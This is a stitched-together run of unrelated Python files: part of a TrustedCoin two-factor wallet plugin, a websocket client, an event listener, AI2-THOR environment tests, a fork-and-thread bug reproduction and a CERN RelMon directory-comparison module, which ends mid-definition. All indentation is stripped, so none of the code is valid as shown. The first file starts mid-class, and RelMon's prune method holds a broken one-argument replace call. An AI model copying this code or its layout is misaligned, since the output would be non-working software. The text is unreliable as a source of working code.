def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
_wsio.py
|
# -*- coding: utf-8 -*-
from ._events import EventEmitter
import websocket
import Queue as queue
import _packet
import threading
import signal
import six
original_signal_handler = None
connected_clients = []
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
def signal_handler(sig, frame):
for client in connected_clients[:]:
client.disconnect(abort=True)
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
class ConnectionError(Exception):
pass
class Wsio(EventEmitter):
events = ['connect', 'disconnect', 'message']
def __init__(self):
EventEmitter.__init__(self)
global original_signal_handler
if original_signal_handler is None:
original_signal_handler = signal.signal(
signal.SIGINT, signal_handler)
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.sid = None
self.state = 'disconnected'
def connect(self, url, header={}):
if(self.state != 'disconnected'):
self.emit('error', ValueError('Client is not in a disconnected state'))
return False
self.queue=self.create_queue()
try:
ws=websocket.create_connection(url, header=header)
except (IOError, websocket.WebSocketException) as e:
self.emit('error', e)
return False
try:
# handshake packet
p=ws.recv()
except Exception as e:
self.emit('error', e)
ws.close()
return False
handshake_packet=_packet.Packet(encoded_packet=p)
if handshake_packet.packet_type != _packet.HANDSHAKE:
self.emit('error', ConnectionError('no OPEN packet'))
return False
self.sid=handshake_packet.data[u'sid']
self.ping_interval=handshake_packet.data[u'pingInterval']/1000.0
self.ping_timeout=handshake_packet.data[u'pingTimeout']/1000.0
# print 'ping_interval:'+str(self.ping_interval)
# print 'ping_timeout:'+str(self.ping_timeout)
self.state='connected'
connected_clients.append(self)
self.emit('connect')
self.ws=ws
self.ping_loop_task=self.start_background_task(self._ping_loop)
self.write_loop_task=self.start_background_task(self._write_loop)
self.read_loop_task=self.start_background_task(self._read_loop)
return True
def send(self, data):
if self.state != 'connected':
return
self.queue.put(data)
def create_queue(self, *args, **kwargs):
q=queue.Queue(*args, **kwargs)
q.Empty=queue.Empty
return q
def create_event(self, *args, **kwargs):
return threading.Event(*args, **kwargs)
def start_background_task(self, target, *args, **kwargs):
th=threading.Thread(target=target, args=args, kwargs=kwargs)
th.setDaemon(True)
th.start()
return th
def disconnect(self, abort=False):
if self.state == 'connected':
self.queue.put(None)
self.state='disconnecting'
self.emit('disconnect')
self.ws.close()
if not abort:
if self.read_loop_task:
self.read_loop_task.join()
self.state='disconnected'
try:
connected_clients.remove(self)
except ValueError:
pass
self._reset()
def _ping_loop(self):
self.pong_received=True
if self.ping_loop_event is None:
self.ping_loop_event=self.create_event()
else:
self.ping_loop_event.clear()
while(self.state == 'connected' and self.ws.connected):
if not self.pong_received:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received=False
self.ws.ping()
self.ping_loop_event.wait(timeout=self.ping_interval)
def _write_loop(self):
while self.state == 'connected' and self.ws.connected:
timeout=max(self.ping_interval, self.ping_timeout)+5
packets=None
try:
packets=[self.queue.get(timeout=timeout)]
except self.queue.Empty:
continue
if packets == [None]:
self.queue.task_done()
packets=[]
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets=packets[:-1]
self.queue.task_done()
break
if not packets:
break
try:
for pkt in packets:
self.ws.send(pkt)
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
break
def _read_loop(self):
while self.state == 'connected' and self.ws.connected:
opcode=None
data=None
try:
opcode, data=self.ws.recv_data(True)
except websocket.WebSocketConnectionClosedException:
self.queue.put(None)
break
except Exception as e:
self.emit('error', e)
self.queue.put(None)
break
if six.PY3 and opcode == OPCODE_TEXT:
data=data.decode("utf-8")
# print 'recv:',data
if opcode in (OPCODE_BINARY, OPCODE_TEXT):
self.emit('message', data)
elif opcode == OPCODE_PONG:
self.pong_received=True
elif opcode == OPCODE_CLOSE:
self.disconnect(abort=True)
self.write_loop_task.join()
if self.ping_loop_event:
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self.emit('disconnect')
try:
connected_clients.remove(self)
except ValueError:
pass
self._reset()
def _reset(self):
self.state='disconnected'
self.sid=None
|
events.py
|
from threading import Thread
class Events:
def _handle(self, function: object, wrapper: object) -> None:
data = function()
while True:
_data = function()
if data != _data:
wrapper(_data)
data = _data
def listen(self, *args: object) -> object:
def wrap(wrapper):
thread = Thread(target=self._handle, args=(args[0], wrapper))
thread.start()
return wrap
|
test_ai2thor_wrapper.py
|
"""
Tests related to the ai2thor environment wrapper.
"""
import random
import threading
import time
import unittest
import warnings
import ai2thor.controller
from gym_ai2thor.envs.ai2thor_env import AI2ThorEnv
class TestAI2ThorEnv(unittest.TestCase):
"""
General environment generation tests
"""
def test_environments_runs(self):
"""
Checks to see if the environment still runs and nothing breaks. Useful for continuous
deployment and keeping master stable. Also, we check how much time 10 steps takes within
the environment. Final assert checks if max_episode_length is equal to the number of steps
taken and no off-by-one errors.
Prints the execution time at the end of the test for performance check.
"""
num_steps = 10
env = AI2ThorEnv()
start = time.time()
all_step_times = []
env.reset()
for step_num in range(num_steps):
start_of_step = time.time()
action = env.action_space.sample()
state, reward, done, _ = env.step(action)
time_for_step = time.time() - start_of_step
print('Step: {}. env.task.step_num: {}. Time taken for step: {:.3f}'.
format(step_num, env.task.step_num, time_for_step))
all_step_times.append(time_for_step)
if done:
break
print('Time taken altogether: {}\nAverage time taken per step: {:.3f}'.format(
time.time() - start, sum(all_step_times) / len(all_step_times)))
self.assertTrue(len(all_step_times) == num_steps)
env.close()
def test_all_task_init(self):
"""
Test that the creation of all tasks still works by taking a few random steps after
resetting environment
"""
param_list = [
{
'pickup_objects': [
'Mug',
'Apple'
],
'task': {
'task_name': 'PickUpTask',
'target_objects': {'Mug': 1, 'Apple': 5}
}
}
]
for params in param_list:
env = AI2ThorEnv(config_dict=params)
state = env.reset()
for i in range(5):
action = env.action_space.sample()
state, reward, done, _ = env.step(action)
env.close()
def test_cup_task_and_interaction_actions(self):
"""
Check if picking up and putting down cup works and agent receives reward of 2 for doing it
twice. For putting the cup down, the agent places it in the microwave and then picks it up
again. Also this implicitly checks there is no random initialisation and that the same
actions in the same environment will achieve the same reward each time.
"""
actions_to_look_at_cup = ['RotateRight', 'RotateRight', 'MoveAhead', 'MoveAhead',
'RotateRight', 'MoveAhead', 'MoveAhead', 'RotateLeft', 'MoveAhead', 'MoveAhead',
'MoveAhead', 'RotateLeft', 'LookDown', 'PickupObject', 'PutObject', 'LookUp',
'MoveRight', 'OpenObject', 'PutObject', 'PickupObject', 'CloseObject']
env = AI2ThorEnv(config_dict={'scene_id': 'FloorPlan28',
'gridSize': 0.25,
'acceptable_receptacles': [
'Microwave' # the used receptacle below
],
'target_objects': {'Mug': 1}})
movement_penalty = len(actions_to_look_at_cup) * env.task.movement_reward
for episode in range(2): # twice to make sure no random initialisation
env.reset()
rewards = []
for action_str in actions_to_look_at_cup:
action = env.action_names.index(action_str)
state, reward, done, _ = env.step(action)
rewards.append(reward)
if done:
break
self.assertAlmostEqual(sum(rewards), 2 + movement_penalty)
env.close()
def test_config_override(self):
"""
Check if reading both a config file and a config dict at the same time works and that the
correct warning occurs for overwriting. Afterwards, check if scene_id was correctly
changed from overwriting
"""
with warnings.catch_warnings(record=True) as warning_objs:
env = AI2ThorEnv(config_file='config_files/config_example.json',
config_dict={'scene_id': 'FloorPlan27'})
# checking if correct warning appears (there could be multiple depending on user)
self.assertTrue([w for w in warning_objs if
'Key: scene_id already in config file' in w.message.args[0]])
self.assertTrue(env.scene_id == 'FloorPlan27')
env.close()
@staticmethod
def test_simple_example():
"""
Taken from here: http://ai2thor.allenai.org/tutorials/examples
"""
controller = ai2thor.controller.Controller()
controller.start()
# Kitchens: FloorPlan1 - FloorPlan30
# Living rooms: FloorPlan201 - FloorPlan230
# Bedrooms: FloorPlan301 - FloorPlan330
# Bathrooms: FloorPLan401 - FloorPlan430
controller.reset('FloorPlan28')
controller.step(dict(action='Initialize', gridSize=0.25))
event = controller.step(dict(action='MoveAhead'))
# Numpy Array - shape (width, height, channels), channels are in RGB order
event.frame
# Numpy Array in BGR order suitable for use with OpenCV
event.cv2img
# current metadata dictionary that includes the state of the scene
event.metadata
@staticmethod
def test_calling_complex_actions():
"""
Examples of how to interact with environment internals e.g. picking up, placing and
opening objects.
Taken from here: http://ai2thor.allenai.org/tutorials/examples
"""
controller = ai2thor.controller.Controller()
controller.start()
controller.reset('FloorPlan28')
controller.step(dict(action='Initialize', gridSize=0.25))
controller.step(dict(action='Teleport', x=-1.25, y=1.00, z=-1.5))
controller.step(dict(action='LookDown'))
event = controller.step(dict(action='Rotate', rotation=90))
# In FloorPlan28, the agent should now be looking at a mug
for obj in event.metadata['objects']:
if obj['visible'] and obj['pickupable'] and obj['objectType'] == 'Mug':
event = controller.step(dict(action='PickupObject', objectId=obj['objectId']),
raise_for_failure=True)
mug_object_id = obj['objectId']
break
# the agent now has the Mug in its inventory
# to put it into the Microwave, we need to open the microwave first
event = controller.step(dict(action='LookUp'))
for obj in event.metadata['objects']:
if obj['visible'] and obj['openable'] and obj['objectType'] == 'Microwave':
event = controller.step(dict(action='OpenObject', objectId=obj['objectId']),
raise_for_failure=True)
receptacle_object_id = obj['objectId']
break
event = controller.step(dict(action='MoveRight'), raise_for_failure=True)
event = controller.step(dict(action='PutObject',
receptacleObjectId=receptacle_object_id,
objectId=mug_object_id),
raise_for_failure=True)
# close the microwave
event = controller.step(dict(
action='CloseObject',
objectId=receptacle_object_id), raise_for_failure=True)
@staticmethod
def test_multithreaded():
"""
Stress test and also shows how multi-threading can be used to greatly speed up processing,
specially to support the rendering of class, object and depth images.
Adapted from here: http://ai2thor.allenai.org/tutorials/examples
Extra analysis done on adding unity information. Important for training models to know.
~67 FPS with 1 thread no extra info
~61 FPS with 1 thread added class info
~18 FPS with 1 thread added Object info on top
~17 FPS with 1 thread added Depth info on top
~70 FPS with 2 threads and no depth, class and object image
~15 FPS with 2 threads and all three of those
Good examples of how to multi-thread are below
"""
thread_count = 1
def run(thread_num):
"""
Runs 5 iterations of 10 steps of the environment with the different rendering options
:param thread_num: (int) Number of threads to launch
"""
env = ai2thor.controller.Controller()
env.start()
render_depth_image, render_class_image, render_object_image = False, False, False
# 50 is an arbritary number
for i in range(5):
t_start = time.time()
env.reset('FloorPlan1')
# env.step({'action': 'Initialize', 'gridSize': 0.25})
# Compare the performance with all the extra added information
# Big take away is that Object instance information makes it much slower
if i == 2:
render_class_image = True
print('Thread num: {}. Added Class info'.format(thread_num))
elif i == 3:
render_object_image = True
print('Thread num: {}. Added Object info'.format(thread_num))
elif i == 4:
render_depth_image = True
print('Thread num: {}. Added Depth info'.format(thread_num))
env.step(dict(action='Initialize',
gridSize=0.25,
renderDepthImage=render_depth_image,
renderClassImage=render_class_image,
renderObjectImage=render_object_image))
print('Thread num: {}. init time: {}'.format(thread_num, time.time() - t_start))
t_start_total = time.time()
for _ in range(10):
env.step({'action': 'MoveAhead'})
env.step({'action': 'RotateRight'})
total_time = time.time() - t_start_total
print('Thread num: {}. Total time for 10 steps: {}. {:.2f} fps'.
format(thread_num, total_time, 50 / total_time))
threads = [threading.Thread(target=run, args=(thread_num, ))
for thread_num in range(thread_count)]
for thread in threads:
thread.daemon = True
thread.start()
time.sleep(1)
for thread in threads:
# calling join() in a loop/timeout to allow for Python 2.7
# to be interrupted with SIGINT
while thread.isAlive():
thread.join(1)
print('done')
if __name__ == '__main__':
unittest.main()
|
issue_6642.py
|
#!/usr/bin/env python
# https://bugs.python.org/issue6642
import os, sys, time, threading
def worker():
childpid = os.fork()
if childpid != 0:
# Parent waits for child.
os.waitpid(childpid, 0)
else:
# Child spawns a daemon thread and then returns immediately.
def daemon():
while True:
time.sleep(1)
d = threading.Thread(target=daemon)
d.daemon = True
d.start()
# NOTE: We return, and do not call sys.exit(0) or d.join().
# The process should exit without waiting for the daemon thread.
# But due to a bug relating to os.fork and threads it will hang.
return
w = threading.Thread(target=worker)
w.start()
w.join()
|
dirstructure.py
|
from __future__ import print_function
from __future__ import absolute_import
################################################################################
# RelMon: a tool for automatic Release Comparison
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/RelMon
#
#
#
# Danilo Piparo CERN - danilo.piparo@cern.ch
#
################################################################################
from array import array
from copy import deepcopy
from os import chdir,getcwd,listdir,makedirs,rmdir
from os.path import exists,join
import sys
argv=sys.argv
from ROOT import *
sys.argv=argv
from .definitions import *
from .utils import setTDRStyle
# Something nice and familiar
setTDRStyle()
# Do not display the canvases
gROOT.SetBatch(kTRUE)
#-------------------------------------------------------------------------------
_log_level=5
def logger(msg_level,message):
if msg_level>=_log_level:
print("[%s] %s" %(asctime(),message))
#-------------------------------------------------------------------------------
class Weighted(object):
def __init__(self,name,weight=1):
self.name=name
self.weight=weight
#-------------------------------------------------------------------------------
class CompInfo(object):
def __init__(self,sample1="",sample2="",release1="",release2="",run1="",run2="",tier1=0,tier2=0):
self.sample1=sample1
self.sample2=sample2
self.release1=release1
self.release2=release2
self.run1=run1
self.run2=run2
self.tier1=tier1
self.tier2=tier2
#-------------------------------------------------------------------------------
class Directory(Weighted):
def __init__(self,name,mother_dir="",meta=CompInfo(),draw_success=False,do_pngs=False):
self.mother_dir=mother_dir
self.meta=meta
self.subdirs=[]
self.comparisons=[]
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.stats_calculated=False
Weighted.__init__(self,name)
self.draw_success=draw_success
self.do_pngs=do_pngs
self.rank_histo=TH1I("rh%s"%name,"",50,-0.01,1.001)
self.rank_histo.SetDirectory(0)
self.different_histograms = {}
self.different_histograms['file1']= {}
self.different_histograms['file2']= {}
self.filename1 = ""
self.filename2 = ""
self.n_missing_objs = 0
self.full_path = ""
def is_empty(self):
if len(self.subdirs)==0 and len(self.comparisons)==0:
return True
return False
def calcStats(self,make_pie=True):
'''Walk all subdirs and calculate weight,fails and successes.
Moreove propagate the sample and releases names.
'''
if self.stats_calculated:
return 0
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_missing_objs = len(self.different_histograms['file1'])+len(self.different_histograms['file2'])
if self.n_missing_objs != 0:
print(" [*] Missing in %s: %s" %(self.filename1, self.different_histograms['file1']))
print(" [*] Missing in %s: %s" %(self.filename2, self.different_histograms['file2']))
# clean from empty dirs
self.subdirs = [subdir for subdir in self.subdirs if not subdir.is_empty()]
for comp in self.comparisons:
if comp.status == SKIPED: #in case its in black list & skiped
self.n_skiped += 1
self.n_comp_skiped += 1
self.weight+=1
else: #else original code -> to check for Fails and Successes
self.rank_histo.Fill(comp.rank)
self.weight+=1
if comp.status == FAIL:
self.n_fails+=1
self.n_comp_fails+=1
elif comp.status == SUCCESS:
self.n_successes+=1
self.n_comp_successes+=1
else:
self.n_nulls+=1
self.n_comp_nulls+=1
for subdir in self.subdirs:
subdir.mother_dir=join(self.mother_dir,self.name)
subdir.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
subdir.calcStats(make_pie)
subdir.meta=self.meta
self.weight+=subdir.weight
self.n_fails+=subdir.n_fails
self.n_successes+=subdir.n_successes
self.n_nulls+=subdir.n_nulls
self.n_skiped+=subdir.n_skiped
self.n_missing_objs += subdir.n_missing_objs
self.rank_histo.Add(subdir.rank_histo)
self.stats_calculated=True
self.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
#if make_pie:
#self.__create_pie_image()
def get_subdirs_dict(self):
subdirdict={}
for subdir in self.subdirs:
subdirdict[subdir.name]=subdir
return subdirdict
def get_subdirs_names(self):
subdirnames=[]
for subdir in self.subdirs:
subdirnames.append(subdir.name)
return subdirnames
def get_summary_chart_ajax(self,w=400,h=300):
"""Emit the ajax to build a pie chart using google apis...
"""
url = "https://chart.googleapis.com/chart?"
url+= "cht=p3" # Select the 3d chart
#url+= "&chl=Success|Null|Fail" # give labels
url+= "&chco=00FF00|FFFF00|FF0000|7A7A7A" # give colours to labels
url+= "&chs=%sx%s" %(w,h)
#url+= "&chtt=%s" %self.name
url+= "&chd=t:%.2f,%.2f,%.2f,%.2f"%(self.get_success_rate(),self.get_null_rate(),self.get_fail_rate(),self.get_skiped_rate())
return url
def print_report(self,indent="",verbose=False):
if len(indent)==0:
self.calcStats(make_pie=False)
# print small failure report
if verbose:
fail_comps=[comp for comp in self.comparisons if comp.status==FAIL]
fail_comps=sorted(fail_comps,key=lambda comp:comp.name )
if len(fail_comps)>0:
print(indent+"* %s/%s:" %(self.mother_dir,self.name))
for comp in fail_comps:
print(indent+" - %s: %s Test Failed (pval = %s) " %(comp.name,comp.test_name,comp.rank))
for subdir in self.subdirs:
subdir.print_report(indent+" ",verbose)
if len(indent)==0:
print("\n%s - summary of %s tests:" %(self.name,self.weight))
print(" o Failiures: %.2f%% (%s/%s)" %(self.get_fail_rate(),self.n_fails,self.weight))
print(" o Nulls: %.2f%% (%s/%s) " %(self.get_null_rate(),self.n_nulls,self.weight))
print(" o Successes: %.2f%% (%s/%s) " %(self.get_success_rate(),self.n_successes,self.weight))
print(" o Skipped: %.2f%% (%s/%s) " %(self.get_skiped_rate(),self.n_skiped,self.weight))
print(" o Missing objects: %s" %(self.n_missing_objs))
def get_skiped_rate(self):
if self.weight == 0: return 0
return 100.*self.n_skiped/self.weight
def get_fail_rate(self):
if self.weight == 0:return 0
return 100.*self.n_fails/self.weight
def get_success_rate(self):
if self.weight == 0:return 1
return 100.*self.n_successes/self.weight
def get_null_rate(self):
if self.weight == 0:return 0
return 100.*self.n_nulls/self.weight
def __get_full_path(self):
#print "Mother is %s" %self.mother_dir
if len(self.mother_dir)==0:
return self.name
return join(self.mother_dir,self.name)
def __create_on_disk(self):
if not exists(self.mother_dir) and len(self.mother_dir)!=0:
makedirs(self.mother_dir)
full_path=self.__get_full_path()
if not exists(full_path) and len(full_path)>0:
makedirs(full_path)
def get_summary_chart_name(self):
return join(self.__get_full_path(),"summary_chart.png")
def __create_pie_image(self):
self.__create_on_disk()
vals=[]
colors=[]
for n,col in zip((self.n_fails,self.n_nulls,self.n_successes,self.n_skiped),(kRed,kYellow,kGreen,kBlue)):
if n!=0:
vals.append(n)
colors.append(col)
valsa=array('f',vals)
colorsa=array('i',colors)
can = TCanvas("cpie","TPie test",100,100);
try:
pie = TPie("ThePie",self.name,len(vals),valsa,colorsa);
label_n=0
if self.n_fails!=0:
pie.SetEntryLabel(label_n, "Fail: %.1f(%i)" %(self.get_fail_rate(),self.n_fails) );
label_n+=1
if self.n_nulls!=0:
pie.SetEntryLabel(label_n, "Null: %.1f(%i)" %(self.get_null_rate(),self.n_nulls) );
label_n+=1
if self.n_successes!=0:
pie.SetEntryLabel(label_n, "Success: %.1f(%i)" %(self.get_success_rate(),self.n_successes) );
if self.n_skiped!=0:
pie.SetEntryLabel(label_n, "Skipped: %.1f(%i)" %(self.get_skiped_rate(),self.n_skiped));
pie.SetY(.52);
pie.SetAngularOffset(0.);
pie.SetLabelsOffset(-.3);
#pie.SetLabelFormat("#splitline{%val (%perc)}{%txt}");
pie.Draw("3d nol");
can.Print(self.get_summary_chart_name());
except:
print("self.name = %s" %self.name)
print("len(vals) = %s (vals=%s)" %(len(vals),vals))
print("valsa = %s" %valsa)
print("colorsa = %s" %colorsa)
def prune(self,expandable_dir):
"""Eliminate from the tree the directory the expandable ones.
"""
#print "pruning %s" %self.name
exp_index=-1
counter=0
for subdir in self.subdirs:
# Eliminate any trace of the expandable path in the mother directories
# for depths higher than 1
subdir.mother_dir=subdir.mother_dir.replace("/"+expandable_dir,"")
if subdir.name==expandable_dir:
exp_index=counter
counter+=1
# Did we find an expandable?
if exp_index>=0:
exp_dir=self.subdirs[exp_index]
for subsubdir in exp_dir.subdirs:
#print "*******",subsubdir.mother_dir,
subsubdir.mother_dir=subsubdir.mother_dir.replace("/"+expandable_dir,"")
while "//" in subsubdir.mother_dir:
print(subsubdir.mother_dir)
subsubdir.mother_dir=subsubdir.mother_dir.replace("//","/")
#print "*******",subsubdir.mother_dir
self.subdirs.append(subsubdir)
for comp in exp_dir.comparisons:
comp.mother_dir=comp.mother_dir.replace("/"+expandable_dir,"")
while "//" in comp.mother_dir:
comp.mother_dir
comp.mother_dir=comp.mother_dir.replace("/")
if not comp in self.comparisons: #in case not to append same comparisons few times
self.comparisons.append(comp) # add a comparison
self.n_comp_fails = exp_dir.n_comp_fails #copy to-be removed directory
self.n_comp_nulls = exp_dir.n_comp_nulls # numbers to parent directory
self.n_comp_successes = exp_dir.n_comp_successes
self.n_comp_skiped = exp_dir.n_comp_skiped
del self.subdirs[exp_index]
self.prune(expandable_dir)
for subdir in self.subdirs:
subdir.prune(expandable_dir)
def __repr__(self):
if self.is_empty():
return "%s seems to be empty. Please check!" %self.name
content="%s , Rates: Success %.2f%%(%s) - Fail %.2f%%(%s) - Null %.2f%%(%s)\n" %(self.name,self.get_success_rate(),self.n_successes,self.get_fail_rate(),self.n_fails,self.get_null_rate(),self.n_nulls)
for subdir in self.subdirs:
content+=" %s\n" % subdir
for comp in self.comparisons:
content+=" %s\n" % comp
return content
#-------------------------------------------------------------------------------
from multiprocessing import Process
def print_multi_threaded(canvas,img_name):
canvas.Print(img_name)
tcanvas_print_processes=[]
#-------------------------------------------------------------------------------
class Comparison(Weighted):
canvas_xsize=500
canvas_ysize=400
def __init__(self,name,mother_dir,h1,h2,stat_test,draw_success=False,do_pngs=False, skip=False):
self.name=name
self.png_name="placeholder.png"
self.mother_dir=mother_dir
self.img_name=""
#self.draw_success=draw_success
Weighted.__init__(self,name)
stat_test.set_operands(h1,h2)
if skip:
self.status = SKIPED
self.test_name=stat_test.name
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.rank = 0
else:
self.status=stat_test.get_status()
self.rank=stat_test.get_rank()
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.do_pngs=do_pngs
self.draw_success=draw_success or not do_pngs
if ((self.status==FAIL or self.status==NULL or self.status == SKIPED or self.draw_success) and self.do_pngs):
self.__make_image(h1,h2)
#self.__make_image(h1,h2)
def __make_img_dir(self):
if not exists(self.mother_dir):
makedirs(self.mother_dir)
def __get_img_name(self):
#self.__make_img_dir()
#print "MOTHER: ",self.mother_dir
self.img_name="%s/%s.png"%(self.mother_dir,self.name)
self.img_name=self.img_name.replace("Run summary","")
self.img_name=self.img_name.replace("/","_")
self.img_name=self.img_name.strip("_")
#print "IMAGE NAME: %s " %self.img_name
return self.img_name
def tcanvas_slow(self,canvas):
#print "About to print %s" %self.img_name
#print_multi_threaded(canvas,self.img_name)
#print "-->Printed"
p = Process(target=print_multi_threaded, args=(canvas,self.img_name))
p.start()
tcanvas_print_processes.append(p)
n_proc=len(tcanvas_print_processes)
if n_proc>3:
p_to_remove=[]
for iprocess in xrange(0,n_proc):
p=tcanvas_print_processes[iprocess]
p.join()
p_to_remove.append(iprocess)
adjustment=0
for iprocess in p_to_remove:
tcanvas_print_processes.pop(iprocess-adjustment)
adjustment+=1
def __make_image(self,obj1,obj2):
self.img_name=self.__get_img_name()
if self.rank==-1:
return 0
canvas=TCanvas(self.name,self.name,Comparison.canvas_xsize,Comparison.canvas_ysize)
objs=(obj1,obj2)
# Add some specifics for the graphs
obj1.SetTitle(self.name)
if obj1.GetNbinsY()!=0 and not "2" in obj1.ClassName() :
obj1 .SetLineWidth(2)
obj2 .SetLineWidth(2)
obj1.SetMarkerStyle(8)
obj1.SetMarkerSize(.8)
obj2.SetMarkerStyle(8)
obj2.SetMarkerSize(.8)
obj1.SetMarkerColor(kBlue)
obj1.SetLineColor(kBlue)
obj2.SetMarkerColor(kRed)
obj2.SetLineColor(kRed)
obj1.Draw("EP")
#Statsbox
obj2.Draw("HistSames")
#gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
else:
obj1.Draw("Colz")
gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
obj2.Draw("ColSame")
# Put together the TLatex for the stat test if possible
color=kGreen+2 # which is green, as everybody knows
if self.status==FAIL:
print("This comparison failed %f" %self.rank)
color=kRed
elif self.status==NULL:
color=kYellow
elif self.status==SKIPED:
color=kBlue #check if kBlue exists ;)
lat_text="#scale[.7]{#color[%s]{%s: %2.2f}}" %(color,self.test_name,self.rank)
lat=TLatex(.1,.91,lat_text)
lat.SetNDC()
lat.Draw()
# Put also the stats together!
n1=obj1.GetEntries()
if n1> 100000:
n1="%e"%n1
else:
n1="%s"%n1
n2=obj2.GetEntries()
if n2> 100000:
n2="%e"%n2
else:
n2="%s"%n2
lat_text1="#scale[.7]{#color[%s]{Entries: %s}}" %(obj1.GetLineColor(),n1)
lat1=TLatex(.3,.91,lat_text1)
lat1.SetNDC()
lat1.Draw()
lat_text2="#scale[.7]{#color[%s]{Entries: %s}}" %(obj2.GetLineColor(),n2)
lat2=TLatex(.6,.91,lat_text2)
lat2.SetNDC()
lat2.Draw()
self.tcanvas_slow(canvas)
def __repr__(self):
